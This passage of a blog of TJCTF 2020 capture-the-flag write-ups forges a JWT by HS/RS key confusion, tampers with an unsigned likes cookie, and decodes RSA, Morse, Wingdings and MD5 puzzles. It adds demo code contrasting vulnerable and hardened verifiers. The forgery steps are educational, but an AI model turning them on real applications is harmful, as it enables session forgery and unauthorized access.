<div class="highlight"><pre><span></span><code>╰─ python3 jwt_tool.py <span class="s2">"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjp0cnVlLCJpc19vbWthciI6ZmFsc2UsIm1vbmV5IjoxMDAsImhvcnNlcyI6W119.IwmdkE7qMzr_TzW_RvloMIz_36QKnGVcxh2FW7oUnVRztoyeRQd-LDuIXyPn7dyCaaeLLI3wXCeokCrnoBwdpqNFNInyzJEZORxBiGgHpHBpOAdVxhGOGN1dWw0pEw1so-VhGKCI5DVOtuKM_VXHqTbUtMKvoHYjwDIOTisQr1VJRR81Tu6uqzA6nf0Deu943KOMF42MEcI7yGjAwpoYMkz9CF3dX9dX1MrEIJZeN19iyfSB7apgm71gJqPJBTiI0xFKH1TXQHHfViaF8stdqDlPKo4FgWe1Ol5Zqf-fBqkv4GK_DyR36ws9Aw32ompXEPicR26JY_4nK8d_EJE5gxceN7az1xkVy9OQEpSuNDQDYBNrE7-gUtL8Q1PcwOkqN_RRT1XSEg_Cr05QOr6FDsbClQihx-Wf5pY_p58fu81_NbQRzjvQIYEBShJ6GVEXf4DB8W5SkA-KR17TdHxT7uWi270KBEQ92AWH4XtRRN01dR65px01X1M1MbkYvuPE3_QoegeN6_TP3GLEB4fMQyha_zD_OWp8Z8mzrcNERrR0933ODXujtPfQwgf7oqYXVjyfo3QYDsjgCBMejqyeIgzvVc-KpLyauDQPCxsqNalCUFwqo-0wkGJUkYAG0fwVbyi2AeWIJGPdBPF1cJ6-fkctoMwDvBzoGJnbcF93Gmc"</span>
<span class="o">=====================</span>
Decoded Token Values:
<span class="o">=====================</span>
Token header values:
<span class="o">[</span>+<span class="o">]</span> <span class="nv">typ</span> <span class="o">=</span> <span class="s2">"JWT"</span>
<span class="o">[</span>+<span class="o">]</span> <span class="nv">alg</span> <span class="o">=</span> <span class="s2">"RS256"</span>
Token payload values:
<span class="o">[</span>+<span class="o">]</span> <span class="nv">user</span> <span class="o">=</span> True
<span class="o">[</span>+<span class="o">]</span> <span class="nv">is_omkar</span> <span class="o">=</span> False
<span class="o">[</span>+<span class="o">]</span> <span class="nv">money</span> <span class="o">=</span> <span class="m">100</span>
<span class="o">[</span>+<span class="o">]</span> <span class="nv">horses</span> <span class="o">=</span> <span class="o">[]</span>
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>Ok, now we have a valid token. But before the race, we need to find a horse name that is faster than the boss's. We can brute-force it by generating random names and checking whether the resulting speed is bigger:</p>
<div class="highlight"><pre><span></span><code>import random
import string
import hashlib


def get_random_alphaNumeric_string(stringLength=16):
    lettersAndDigits = string.ascii_letters + string.digits
    return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))


def speed(horse_name):
    # same formula as server.py: MD5 of "Horse_" + name, read as a base-16 integer
    return int(hashlib.md5(("Horse_" + horse_name).encode()).hexdigest(), 16)


target = speed("MechaOmkar-YG6BPRJM")
horse_name = get_random_alphaNumeric_string()
current = speed(horse_name)
# keep drawing random names until one hashes to a higher speed than the boss
while target > current:
    horse_name = get_random_alphaNumeric_string()
    current = speed(horse_name)

print(horse_name)
print(current)
</code></pre></div>
<div class="highlight"><pre><span></span><code>╰─ python hrose_name.py
fqXAic5PcqpNOvWM
<span class="m">340282346669807837605444135570825176873</span>
</code></pre></div>
<p>We can now edit the JWT token again and add our new horse name to the list.</p>
<p>This tool lets us edit any value in the token and try several attacks to get the edits accepted. The website uses RS256 and we have the public key, so we can use the HS/RS key confusion: the tool re-signs the token with HS256, using the public key as the HMAC secret, which a verifier that lets the token pick its own algorithm will accept.</p>
<div class="highlight"><pre><span></span><code>Please make a selection <span class="o">(</span><span class="m">1</span>-8<span class="o">)</span>
> <span class="nv">1</span>
<span class="o">====================================================================</span>
This option allows you to tamper with the header, contents and
signature of the JWT.
<span class="o">(</span>Force string values in claims by enclosing in <span class="s2">"double quotes"</span>
<span class="o">====================================================================</span>
Token header values:
<span class="o">[</span><span class="m">1</span><span class="o">]</span> <span class="nv">typ</span> <span class="o">=</span> <span class="s2">"JWT"</span>
<span class="o">[</span><span class="m">2</span><span class="o">]</span> <span class="nv">alg</span> <span class="o">=</span> <span class="s2">"RS256"</span>
<span class="o">[</span><span class="m">3</span><span class="o">]</span> *ADD A VALUE*
<span class="o">[</span><span class="m">4</span><span class="o">]</span> *DELETE A VALUE*
<span class="o">[</span><span class="m">0</span><span class="o">]</span> Continue to next step
Please <span class="k">select</span> a field number:
<span class="o">(</span>or <span class="m">0</span> to Continue<span class="o">)</span>
> <span class="m">0</span>
Token payload values:
<span class="o">[</span><span class="m">1</span><span class="o">]</span> <span class="nv">user</span> <span class="o">=</span> True
<span class="o">[</span><span class="m">2</span><span class="o">]</span> <span class="nv">is_omkar</span> <span class="o">=</span> False
<span class="o">[</span><span class="m">3</span><span class="o">]</span> <span class="nv">money</span> <span class="o">=</span> <span class="m">100</span>
<span class="o">[</span><span class="m">4</span><span class="o">]</span> <span class="nv">horses</span> <span class="o">=</span> <span class="o">[]</span>
<span class="o">[</span><span class="m">5</span><span class="o">]</span> *ADD A VALUE*
<span class="o">[</span><span class="m">6</span><span class="o">]</span> *DELETE A VALUE*
<span class="o">[</span><span class="m">0</span><span class="o">]</span> Continue to next step
Please <span class="k">select</span> a field number:
<span class="o">(</span>or <span class="m">0</span> to Continue<span class="o">)</span>
> <span class="m">4</span>
Current value of horses is: <span class="o">[]</span>
Please enter new value and hit ENTER
> <span class="o">[</span><span class="s1">'fqXAic5PcqpNOvWM'</span><span class="o">]</span>
<span class="o">[</span><span class="m">1</span><span class="o">]</span> <span class="nv">user</span> <span class="o">=</span> True
<span class="o">[</span><span class="m">2</span><span class="o">]</span> <span class="nv">is_omkar</span> <span class="o">=</span> False
<span class="o">[</span><span class="m">3</span><span class="o">]</span> <span class="nv">money</span> <span class="o">=</span> <span class="m">100</span>
<span class="o">[</span><span class="m">4</span><span class="o">]</span> <span class="nv">horses</span> <span class="o">=</span> <span class="o">[</span><span class="s1">'fqXAic5PcqpNOvWM'</span><span class="o">]</span>
<span class="o">[</span><span class="m">5</span><span class="o">]</span> *ADD A VALUE*
<span class="o">[</span><span class="m">6</span><span class="o">]</span> *DELETE A VALUE*
<span class="o">[</span><span class="m">0</span><span class="o">]</span> Continue to next step
Please <span class="k">select</span> a field number:
<span class="o">(</span>or <span class="m">0</span> to Continue<span class="o">)</span>
> <span class="m">0</span>
Token Signing:
<span class="o">[</span><span class="m">1</span><span class="o">]</span> Sign token with known HMAC-SHA <span class="s1">'secret'</span>
<span class="o">[</span><span class="m">2</span><span class="o">]</span> Sign token with RSA/ECDSA Private Key
<span class="o">[</span><span class="m">3</span><span class="o">]</span> Strip signature using the <span class="s2">"none"</span> algorithm
<span class="o">[</span><span class="m">4</span><span class="o">]</span> Sign with HS/RSA key confusion vulnerability
<span class="o">[</span><span class="m">5</span><span class="o">]</span> Sign token with key file
<span class="o">[</span><span class="m">6</span><span class="o">]</span> Inject a key and self-sign the token <span class="o">(</span>CVE-2018-0114<span class="o">)</span>
<span class="o">[</span><span class="m">7</span><span class="o">]</span> Self-sign the token and <span class="nb">export</span> an external JWKS
<span class="o">[</span><span class="m">8</span><span class="o">]</span> Keep original signature
Please <span class="k">select</span> an option from above <span class="o">(</span><span class="m">1</span>-5<span class="o">)</span>:
> <span class="m">4</span>
Please enter the Public Key filename:
> pubkey.pem
<span class="o">====================================================================</span>
This option takes an available Public Key <span class="o">(</span>the SSL certificate from
a webserver, <span class="k">for</span> example?<span class="o">)</span> and switches the RSA-signed
<span class="o">(</span>RS256/RS384/RS512<span class="o">)</span> JWT that uses the Public Key as its <span class="s1">'secret'</span>.
<span class="o">====================================================================</span>
File loaded: pubkey.pem
Set this new token as the AUTH cookie, or session/local storage data <span class="o">(</span>as appropriate <span class="k">for</span> the web application<span class="o">)</span>.
<span class="o">(</span>This will only be valid on unpatched implementations of JWT.<span class="o">)</span>
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp0cnVlLCJpc19vbWthciI6ZmFsc2UsIm1vbmV5IjoxMDAsImhvcnNlcyI6WyJmcVhBaWM1UGNxcE5PdldNIl19.G7DkuL3tsxmvHCnWs1jYzNK7altEuMJebYu8CGbiNCY
</code></pre></div>
<p>We replace the current token in the browser with the generated one. Our horse now appears in the race list.</p>
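<p>Why the key-confusion trick works, and the server-side check that stops it, as an added example that is not part of this write-up or of the challenge's <code>server.py</code>: a minimal JWT verifier in the vulnerable style next to one that pins the algorithm. The key pair (two Mersenne primes, so no key generation is needed), the <code>pubkey.pem</code> encoding and the payloads are constructed for the demo; standard library only.</p>

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key pair built from two Mersenne primes, so the script
# needs no key generation and runs offline. Not the challenge's real key.
P, Q = 2**521 - 1, 2**607 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8  # modulus length in bytes (141 here)

# What the server holds after reading pubkey.pem. Demo encoding, not real
# SubjectPublicKeyInfo DER; the point is only that these bytes are public.
PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                  + base64.b64encode(N.to_bytes(K, "big") + E.to_bytes(3, "big"))
                  + b"\n-----END PUBLIC KEY-----\n")

# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def pkcs1_v15_encode(msg: bytes) -> bytes:
    # EM = 0x00 || 0x01 || 0xff...0xff || 0x00 || DigestInfo(SHA-256(msg))
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t


def sign_rs256(payload: dict) -> str:
    """Server-side minting with the private exponent (jwt.encode(..., "RS256"))."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "RS256"}).encode())
    body = b64url(json.dumps(payload).encode())
    em = int.from_bytes(pkcs1_v15_encode(f"{header}.{body}".encode()), "big")
    return f"{header}.{body}.{b64url(pow(em, D, N).to_bytes(K, 'big'))}"


def forge_hs256(payload: dict, secret: bytes) -> str:
    """What jwt_tool option 4 did above: HS256 with the public key as the secret."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def rs256_ok(signing_input: bytes, sig: bytes) -> bool:
    if len(sig) != K:
        return False
    em = pow(int.from_bytes(sig, "big"), E, N).to_bytes(K, "big")
    return hmac.compare_digest(em, pkcs1_v15_encode(signing_input))


def verify_confused(token: str, key_pem: bytes):
    """VULNERABLE: the token's own header picks the algorithm, and the same
    key bytes are handed to whichever one it names."""
    h, b, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    signing_input, sig = f"{h}.{b}".encode(), b64url_decode(s)
    if alg == "HS256":
        expected = hmac.new(key_pem, signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(expected, sig)
    elif alg == "RS256":
        ok = rs256_ok(signing_input, sig)  # a real app parses (N, E) from key_pem
    else:
        ok = False
    return json.loads(b64url_decode(b)) if ok else None


def verify_pinned(token: str, key_pem: bytes):
    """HARDENED: the server fixes the algorithm up front (what PyJWT's
    algorithms=["RS256"] enforces); the header's "alg" is never trusted."""
    h, b, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "RS256":
        return None
    ok = rs256_ok(f"{h}.{b}".encode(), b64url_decode(s))  # (N, E) from key_pem in a real app
    return json.loads(b64url_decode(b)) if ok else None


if __name__ == "__main__":
    genuine = sign_rs256({"user": True, "is_omkar": False, "money": 100, "horses": []})
    forged = forge_hs256({"user": True, "is_omkar": False, "money": 100,
                          "horses": ["fqXAic5PcqpNOvWM"]}, PUBLIC_KEY_PEM)
    print("confused verifier accepts forged token:", verify_confused(forged, PUBLIC_KEY_PEM) is not None)
    print("pinned verifier accepts forged token:  ", verify_pinned(forged, PUBLIC_KEY_PEM) is not None)
    print("pinned verifier accepts genuine token: ", verify_pinned(genuine, PUBLIC_KEY_PEM) is not None)
```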
<p><img alt="MoarHorse4.png" src="https://blog.nlegall.fr/images/tjctf/2020/MoarHorse4.png"></p>
<p>Select the horse in the list and:</p>
<div class="highlight"><pre><span></span><code>You won!
Here's your flag: tjctf{w0www_y0ur_h0rs3_is_f444ST!}
</code></pre></div>
<h2>TJCTF2020 - Rap God</h2>
<p><em>2020-06-02 - nlegall</em> - <a href="/tjctf2020-rap-god.html">/tjctf2020-rap-god.html</a></p>
<p><em>solves : 172</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by rj9
My rapper friend Big Y sent me his latest track but something sounded a little off about it. Help me find out if he was trying to tell me something with it. Submit your answer as tjctf{message}
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/302ed01b56ae5988e8b8ad8d9bba402a2934c71508593f5dc9e95aed913d20cf_BigYAudio.mp3">Audio file</a></p>
<p>We start by opening the audio file. The classic waveform view doesn't show anything, but the spectrogram view shows something much more interesting:</p>
<p><img alt="rapgod_spect.png" src="https://blog.nlegall.fr/images/tjctf/2020/rapgod_spect.png"></p>
<p>Some strange symbols are mixed in with the audio. They remind me of an old font I used as a kid in Word: Wingdings, a font made only of symbols.</p>
<p>I don't want to install Word and the font again, so let's try to find an online tool that can decode it. I found this one: http://grompe.org.ru/static/wingdings_gaster.html.</p>
<p>We can input the symbols by clicking on them, and the flag appears: <code>tjctf{QUICKSONIC}</code>.</p>
<h2>TJCTF2020 - RSABC</h2>
<p><em>2020-06-02 - nlegall</em> - <a href="/tjctf2020-rsabc.html">/tjctf2020-rsabc.html</a></p>
<p><em>solves : 415</em></p>
<div class="highlight"><pre><span></span><code>Written by boomo
I was just listening to some relaxing ASMR when a notification popped up with this.
???
Hint: It's easy as R-S-A! Wait..
</code></pre></div>
<p>We have this information:</p>
<div class="highlight"><pre><span></span><code>n=57772961349879658023983283615621490728299498090674385733830087914838280699121
e=65537
c=36913885366666102438288732953977798352561146298725524881805840497762448828130
</code></pre></div>
<p>Ok, it's RSA; the challenge name and the given values confirm it. We can use <a href="https://github.com/Ganapati/RsaCtfTool">RsaCtfTool</a> to perform the decryption locally:</p>
<div class="highlight"><pre><span></span><code>╰─ python RsaCtfTool.py -n <span class="m">57772961349879658023983283615621490728299498090674385733830087914838280699121</span> -e <span class="m">65537</span> --uncipher <span class="m">36913885366666102438288732953977798352561146298725524881805840497762448828130</span>
<span class="o">[</span>*<span class="o">]</span> Testing key /tmp/tmpg5207siz.
Can<span class="s1">'t load boneh_durfee because sage is not installed</span>
<span class="s1">Can'</span>t load smallfraction because sage is not installed
Can<span class="s1">'t load qicheng because sage is not installed</span>
<span class="s1">Can'</span>t load ecm2 because sage is not installed
Can<span class="s1">'t load roca because sage is not installed</span>
<span class="s1">Can'</span>t load ecm because sage is not installed
<span class="o">[</span>*<span class="o">]</span> Performing factordb attack on /tmp/tmpg5207siz.
Results <span class="k">for</span> /tmp/tmpg5207siz:
Unciphered data :
b<span class="s1">'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00tjctf{BOLm1QMWi3c}'</span>
</code></pre></div>
<p>We have some leading null bytes, but the flag is back: <code>tjctf{BOLm1QMWi3c}</code>.</p>
<h2>TJCTF2020 - Sarah Palin Fanpage</h2>
<p><em>2020-06-02 - nlegall</em> - <a href="/tjctf2020-sarah-palin-fanpage.html">/tjctf2020-sarah-palin-fanpage.html</a></p>
<p><em>solves : 505</em></p>
<div class="highlight"><pre><span></span><code>Points: 35
Written by jpes707
Are you a true fan of Alaska's most famous governor? Visit the Sarah Palin fanpage.
</code></pre></div>
<p><img alt="sarahpalinfanpage_homepage.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_homepage.png"></p>
<p><img alt="sarahpalinfanpage_blocked.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_blocked.png"></p>
<p>So, we need to have all the likes, but we can't get more than 4 on the website: we get detected as spam. The source code doesn't help to bypass it. But the likes seem to be stored somewhere, and the obvious place is a cookie.</p>
<p>We found one, <code>data</code>, but it seems encoded.</p>
<div class="highlight"><pre><span></span><code>╰─ <span class="nb">printf</span> <span class="s2">"eyIxIjpmYWxzZSwiMiI6ZmFsc2UsIjMiOmZhbHNlLCI0IjpmYWxzZSwiNSI6ZmFsc2UsIjYiOnRydWUsIjciOnRydWUsIjgiOnRydWUsIjkiOnRydWUsIjEwIjp0cnVlfQ=="</span> <span class="p">|</span> base64 -d
<span class="o">{</span><span class="s2">"1"</span>:false,<span class="s2">"2"</span>:false,<span class="s2">"3"</span>:false,<span class="s2">"4"</span>:false,<span class="s2">"5"</span>:false,<span class="s2">"6"</span>:true,<span class="s2">"7"</span>:true,<span class="s2">"8"</span>:true,<span class="s2">"9"</span>:true,<span class="s2">"10"</span>:true<span class="o">}</span>
</code></pre></div>
<p>We can edit it, changing every value from <code>false</code> to <code>true</code>, and put it back in the browser:</p>
<div class="highlight"><pre><span></span><code>╰─ <span class="nb">printf</span> <span class="s1">'{"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"7":true,"8":true,"9":true,"10":true}'</span> <span class="p">|</span> base64
<span class="nv">eyIxIjp0cnVlLCIyIjp0cnVlLCIzIjp0cnVlLCI0Ijp0cnVlLCI1Ijp0cnVlLCI2Ijp0cnVlLCI3Ijp0cnVlLCI4Ijp0cnVlLCI5Ijp0cnVlLCIxMCI6dHJ1ZX0</span><span class="o">=</span>
</code></pre></div>
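<p>Why this works: the likes live in a cookie that the server decodes and trusts without any integrity check. As an added example (not the fanpage's own code), the decode used above next to a signed variant that rejects an edited payload; the server secret is constructed for the demo and the cookie value is the one from the browser.</p>

```python
import base64
import hashlib
import hmac
import json

# The "data" cookie exactly as found in the browser above.
ORIGINAL_COOKIE = "eyIxIjpmYWxzZSwiMiI6ZmFsc2UsIjMiOmZhbHNlLCI0IjpmYWxzZSwiNSI6ZmFsc2UsIjYiOnRydWUsIjciOnRydWUsIjgiOnRydWUsIjkiOnRydWUsIjEwIjp0cnVlfQ=="
# Constructed server-side secret for the demo; a real app loads it from config.
SERVER_SECRET = b"demo-secret-not-the-challenge-key"


def load_unsigned(cookie: str) -> dict:
    """What the fanpage does: base64-decode and believe whatever the client
    sent, so the edit shown above is all it takes."""
    return json.loads(base64.b64decode(cookie))


def all_liked(likes: dict) -> bool:
    return all(likes.get(str(i)) is True for i in range(1, 11))


def dump_signed(likes: dict, secret: bytes) -> str:
    """Hardened form: the same base64 payload plus an HMAC-SHA256 tag over it,
    computed with a secret the browser never sees."""
    payload = base64.b64encode(json.dumps(likes, sort_keys=True).encode()).decode()
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def load_signed(cookie: str, secret: bytes):
    """Returns the likes dict only if the tag matches the payload; None
    otherwise. (Keeping the state server-side avoids the problem entirely.)"""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None  # no tag at all: treat like a tampered cookie
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.b64decode(payload))


if __name__ == "__main__":
    likes = load_unsigned(ORIGINAL_COOKIE)
    print("as served:", likes, "all liked:", all_liked(likes))
    all_true = {str(i): True for i in range(1, 11)}
    forged = base64.b64encode(json.dumps(all_true).encode()).decode()
    print("forged payload, unsigned load, all liked:", all_liked(load_unsigned(forged)))
    signed = dump_signed(likes, SERVER_SECRET)
    spliced = forged + "." + signed.rpartition(".")[2]  # forged payload, old tag
    print("forged payload, signed load:", load_signed(spliced, SERVER_SECRET))
```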
<p><img alt="sarahpalinfanpage_flag.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_flag.png"></p>
<h2>TJCTF2020 - Tap Dancing</h2>
<p><em>2020-06-02 - nlegall</em> - <a href="/tjctf2020-tap-dancing.html">/tjctf2020-tap-dancing.html</a></p>
<p><em>solves : 215</em></p>
<div class="highlight"><pre><span></span><code>Points: 25
Written by agcdragon
My friend is trying to teach me to dance, but I am not rhythmically coordinated! They sent me a list of dance moves but they're all numbers! Can you help me figure out what they mean so I can learn the dance?
NOTE: Flag is not in flag format.
</code></pre></div>
<p>We have this cipher text: <code>1101111102120222020120111110101222022221022202022211</code>.</p>
<p>It uses three different characters, so it is not a binary encoding. Another encoding that uses three different symbols is Morse (dot, dash and separator).</p>
<p>Let's try to convert it to Morse. We can try the different digit-to-symbol combinations until we get a working one. The correct one gives us this:</p>
<div class="highlight"><pre><span></span><code>1 -
2 .
0 (space)
-- ----- .-. ... . -. ----- - -... ....- ... . ...--
</code></pre></div>
<p>We can use the following Python code to perform the decoding, or any online tool:</p>
<div class="highlight"><pre><span></span><code><span class="n">MORSE_CODE_DICT</span> <span class="o">=</span> <span class="p">{</span> <span class="s1">'A'</span><span class="p">:</span><span class="s1">'.-'</span><span class="p">,</span> <span class="s1">'B'</span><span class="p">:</span><span class="s1">'-...'</span><span class="p">,</span>
<span class="s1">'C'</span><span class="p">:</span><span class="s1">'-.-.'</span><span class="p">,</span> <span class="s1">'D'</span><span class="p">:</span><span class="s1">'-..'</span><span class="p">,</span> <span class="s1">'E'</span><span class="p">:</span><span class="s1">'.'</span><span class="p">,</span>
<span class="s1">'F'</span><span class="p">:</span><span class="s1">'..-.'</span><span class="p">,</span> <span class="s1">'G'</span><span class="p">:</span><span class="s1">'--.'</span><span class="p">,</span> <span class="s1">'H'</span><span class="p">:</span><span class="s1">'....'</span><span class="p">,</span>
<span class="s1">'I'</span><span class="p">:</span><span class="s1">'..'</span><span class="p">,</span> <span class="s1">'J'</span><span class="p">:</span><span class="s1">'.---'</span><span class="p">,</span> <span class="s1">'K'</span><span class="p">:</span><span class="s1">'-.-'</span><span class="p">,</span>
<span class="s1">'L'</span><span class="p">:</span><span class="s1">'.-..'</span><span class="p">,</span> <span class="s1">'M'</span><span class="p">:</span><span class="s1">'--'</span><span class="p">,</span> <span class="s1">'N'</span><span class="p">:</span><span class="s1">'-.'</span><span class="p">,</span>
<span class="s1">'O'</span><span class="p">:</span><span class="s1">'---'</span><span class="p">,</span> <span class="s1">'P'</span><span class="p">:</span><span class="s1">'.--.'</span><span class="p">,</span> <span class="s1">'Q'</span><span class="p">:</span><span class="s1">'--.-'</span><span class="p">,</span>
<span class="s1">'R'</span><span class="p">:</span><span class="s1">'.-.'</span><span class="p">,</span> <span class="s1">'S'</span><span class="p">:</span><span class="s1">'...'</span><span class="p">,</span> <span class="s1">'T'</span><span class="p">:</span><span class="s1">'-'</span><span class="p">,</span>
<span class="s1">'U'</span><span class="p">:</span><span class="s1">'..-'</span><span class="p">,</span> <span class="s1">'V'</span><span class="p">:</span><span class="s1">'...-'</span><span class="p">,</span> <span class="s1">'W'</span><span class="p">:</span><span class="s1">'.--'</span><span class="p">,</span>
<span class="s1">'X'</span><span class="p">:</span><span class="s1">'-..-'</span><span class="p">,</span> <span class="s1">'Y'</span><span class="p">:</span><span class="s1">'-.--'</span><span class="p">,</span> <span class="s1">'Z'</span><span class="p">:</span><span class="s1">'--..'</span><span class="p">,</span>
<span class="s1">'1'</span><span class="p">:</span><span class="s1">'.----'</span><span class="p">,</span> <span class="s1">'2'</span><span class="p">:</span><span class="s1">'..---'</span><span class="p">,</span> <span class="s1">'3'</span><span class="p">:</span><span class="s1">'...--'</span><span class="p">,</span>
<span class="s1">'4'</span><span class="p">:</span><span class="s1">'....-'</span><span class="p">,</span> <span class="s1">'5'</span><span class="p">:</span><span class="s1">'.....'</span><span class="p">,</span> <span class="s1">'6'</span><span class="p">:</span><span class="s1">'-....'</span><span class="p">,</span>
<span class="s1">'7'</span><span class="p">:</span><span class="s1">'--...'</span><span class="p">,</span> <span class="s1">'8'</span><span class="p">:</span><span class="s1">'---..'</span><span class="p">,</span> <span class="s1">'9'</span><span class="p">:</span><span class="s1">'----.'</span><span class="p">,</span>
<span class="s1">'0'</span><span class="p">:</span><span class="s1">'-----'</span><span class="p">,</span> <span class="s1">', '</span><span class="p">:</span><span class="s1">'--..--'</span><span class="p">,</span> <span class="s1">'.'</span><span class="p">:</span><span class="s1">'.-.-.-'</span><span class="p">,</span>
<span class="s1">'?'</span><span class="p">:</span><span class="s1">'..--..'</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">:</span><span class="s1">'-..-.'</span><span class="p">,</span> <span class="s1">'-'</span><span class="p">:</span><span class="s1">'-....-'</span><span class="p">,</span>
<span class="s1">'('</span><span class="p">:</span><span class="s1">'-.--.'</span><span class="p">,</span> <span class="s1">')'</span><span class="p">:</span><span class="s1">'-.--.-'</span><span class="p">}</span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">message</span><span class="p">):</span>
    <span class="c1"># A trailing space flushes the last letter; two spaces in a row mark a word break</span>
    <span class="n">message</span> <span class="o">+=</span> <span class="s1">' '</span>
    <span class="n">decipher</span> <span class="o">=</span> <span class="s1">''</span>
    <span class="n">citext</span> <span class="o">=</span> <span class="s1">''</span>
    <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="n">letter</span> <span class="ow">in</span> <span class="n">message</span><span class="p">:</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">letter</span> <span class="o">!=</span> <span class="s1">' '</span><span class="p">):</span>
            <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
            <span class="n">citext</span> <span class="o">+=</span> <span class="n">letter</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span>
            <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">:</span>
                <span class="n">decipher</span> <span class="o">+=</span> <span class="s1">' '</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="c1"># Reverse lookup: the key whose Morse value equals the buffered symbol</span>
                <span class="n">decipher</span> <span class="o">+=</span> <span class="nb">list</span><span class="p">(</span><span class="n">MORSE_CODE_DICT</span><span class="o">.</span><span class="n">keys</span><span class="p">())[</span><span class="nb">list</span><span class="p">(</span><span class="n">MORSE_CODE_DICT</span>
                <span class="o">.</span><span class="n">values</span><span class="p">())</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">citext</span><span class="p">)]</span>
                <span class="n">citext</span> <span class="o">=</span> <span class="s1">''</span>
    <span class="k">return</span> <span class="n">decipher</span>
<span class="n">message</span> <span class="o">=</span> <span class="s2">"-- ----- .-. ... . -. ----- - -... ....- ... . ...--"</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"tjctf{"</span> <span class="o">+</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">message</span><span class="p">)</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span> <span class="o">+</span> <span class="s2">"}"</span><span class="p">)</span>
</code></pre></div>
<p>Let's run it and get the flag!</p>
<div class="highlight"><pre><span></span><code>╰─ python decode.py
tjctf<span class="o">{</span>m0rsen0tb4se3<span class="o">}</span>
</code></pre></div>
<h2>TJCTF2020 - Titanic</h2>
<p><em>Published 2020-06-02 by nlegall - <a href="/tjctf2020-titanic.html">/tjctf2020-titanic.html</a></em></p>
<p><em>solves : 256</em></p>
<div class="highlight"><pre><span></span><code>Points: 35
Written by jpes707
I wrapped tjctf{} around the lowercase version of a word said in the 1997 film "Titanic" and created an MD5 hash of it: 9326ea0931baf5786cde7f280f965ebb.
</code></pre></div>
<p>We have all the information needed to find the clear text:</p>
<ul>
<li>A word from the Titanic movie script: <a href="https://www.imsdb.com/scripts/Titanic.html">here</a></li>
<li>Wrapped with the flag format: <code>tjctf{script_word}</code></li>
<li>Hashed with the MD5 algorithm</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">hashlib</span>

<span class="n">target</span> <span class="o">=</span> <span class="s2">"9326ea0931baf5786cde7f280f965ebb"</span>
<span class="n">filepath</span> <span class="o">=</span> <span class="s1">'Titanic.txt'</span>
<span class="c1"># Punctuation glued to the script words has to go before hashing</span>
<span class="n">strip</span> <span class="o">=</span> <span class="nb">str</span><span class="o">.</span><span class="n">maketrans</span><span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="s1">'.,:!?()"'</span><span class="p">)</span>
<span class="c1"># errors='replace' keeps odd bytes in the script from aborting the read</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="n">errors</span><span class="o">=</span><span class="s1">'replace'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">fp</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">word</span> <span class="ow">in</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">():</span>
            <span class="n">word</span> <span class="o">=</span> <span class="n">word</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span><span class="o">.</span><span class="n">translate</span><span class="p">(</span><span class="n">strip</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">word</span> <span class="o">==</span> <span class="s2">""</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="n">flag</span> <span class="o">=</span> <span class="s2">"tjctf{"</span> <span class="o">+</span> <span class="n">word</span> <span class="o">+</span> <span class="s2">"}"</span>
